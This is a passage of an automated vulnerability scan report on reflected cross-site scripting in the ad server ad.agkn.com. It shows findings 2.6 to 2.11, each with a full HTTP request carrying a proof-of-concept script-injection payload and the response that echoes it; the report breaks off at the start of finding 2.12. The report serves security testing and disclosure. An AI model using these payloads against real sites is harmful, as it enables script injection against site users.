%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABMBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flg7HoVyhy11AAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115";alert(1)//760f2f14d5b=1http://ad.agkn.com/interaction!che=1802253544?imid=6357708857464532341&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5340"><script>alert(1)</script>140300babcc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcc HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA8BArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flJrtfJ6qWCjAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcchttp://ad.agkn.com/interaction!che=392546480?imid=5939040586662764707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d44"><script>alert(1)</script>6ee1469f996 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAAwBArwBATUBC%2FEB0AADAUIBBoABQwEGgAFBAQaAAQK8fnjlj%2BuxPLfUAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1603187548?imid=8711527296671725524&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Con
...[SNIP]...

2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ef"><script>alert(1)</script>a402f89f56b was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:05 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJRAAAAABABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjT3r%2FI4Pw%2BjAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:05 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect=http://ad.agkn.com/interaction!che=1794660149?imid=3816712664080388003&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dd2"><script>alert(1)</script>488066488aa was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAA4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjzlQUQ4QovRAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1106824953?imid=4387985173199883217&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 372d8"%3balert(1)//04ade7f7217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372d8";alert(1)//04ade7f7217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8"%3balert(1)//04ade7f7217=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:08 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJUAAAAABYBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkadB%2FcIop4dAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:08 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8";alert(1)//04ade7f7217=1http://ad.agkn.com/interaction!che=1298692797?imid=5088231911581720093&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f604e"><script>alert(1)</script>3e78bbef9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:07 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJTAAAAABQBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjtIPx4EjM5IAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:07 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1http://ad.agkn.com/interaction!che=441258755?imid=4271733644718820936&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

